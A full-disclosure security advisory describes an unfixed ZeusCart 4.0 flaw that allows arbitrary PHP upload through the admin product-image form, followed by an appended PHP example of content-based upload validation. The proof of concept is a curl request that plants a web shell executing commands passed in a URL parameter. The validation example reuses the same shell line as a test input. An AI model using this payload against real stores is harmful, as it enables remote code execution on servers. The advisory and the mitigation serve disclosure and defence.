Message-ID: <55F6F3F1.1090409@curesec.com>
Date: Mon, 14 Sep 2015 18:21:05 +0200
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] ZeusCart 4.0: Code Execution - not fixed

ZeusCart 4.0: Code Execution

Security Advisory – Curesec Research Team

1. Introduction

Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@...scart.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

It is possible to upload PHP files when uploading an image for a new product. This leads to code execution once an attacker has gained access to the backend via SQL Injection, CSRF, or XSS. Please note that an admin account with the right to add products is needed.

3. Proof of Concept

curl -i -s -k -X 'POST' \
 -H 'Content-Type: multipart/form-data; boundary=--------1849257448' \
 -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
 --data-binary $'----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"desc\"\x0d\x0a\x0d\x0adesc\x0d \x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php 
\x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"price\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"msrp_org\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"soh\"\x0d\x0a\x0d\x0a7\x0d\x0a----------1849257448--\x0d\x0a' \
 'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'

The image will be located here:
http://localhost/zeuscart-master/images/products/YYYY-MM-DDHHMMSStest.php

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-Code-Execution-57.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
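The product-image handler described in section 2 accepts whatever filename and content the multipart request carries; the following is an added example of the server-side check such a handler needs, not ZeusCart's code and not part of the advisory. Function names, the accepted-type list and the random-name scheme are assumptions, and the self-check at the bottom runs on a constructed payload and a constructed 1x1 GIF.

```php
<?php
// Added example, not ZeusCart's code: content-based validation for a product
// image upload, the control the handler described above lacks.
declare(strict_types=1);

// Accepted image types mapped to the extension the file is stored under; the
// extension is derived from the detected type, never from the client filename.
const ALLOWED_IMAGE_TYPES = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];

// Return the extension to store $path under, or null if it is not an accepted
// image. getimagesize() parses the real header, so a PHP script uploaded as
// test.php (or renamed test.jpg) is rejected either way.
function detectImageExtension(string $path): ?string
{
    $info = @getimagesize($path);
    if ($info === false || !isset(ALLOWED_IMAGE_TYPES[$info[2]])) {
        return null;
    }
    return ALLOWED_IMAGE_TYPES[$info[2]];
}

// Move one $_FILES entry into $destDir under a random name with the detected
// extension and return that name. Even a polyglot that passes the header check
// is stored as .jpg/.png/.gif, so the web server never hands it to the PHP
// interpreter; keep script execution disabled in the upload directory as well.
function storeProductImage(array $upload, string $destDir): string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('No valid upload');
    }
    $ext = detectImageExtension($upload['tmp_name']);
    if ($ext === null) {
        throw new RuntimeException('Only JPEG, PNG and GIF images are accepted');
    }
    $dest = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store image');
    }
    return basename($dest);
}

// Constructed CLI self-check: a payload like the advisory's versus a 1x1 GIF.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "<?php passthru(\$_GET['x']);");
echo 'php payload: ', var_export(detectImageExtension($tmp), true), PHP_EOL;
file_put_contents($tmp, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
echo 'gif image:   ', var_export(detectImageExtension($tmp), true), PHP_EOL;
unlink($tmp);
```

In a web context storeProductImage() replaces the raw move of the ufile[] entry; run from the CLI the script only exercises the content check, since is_uploaded_file() is false outside a request.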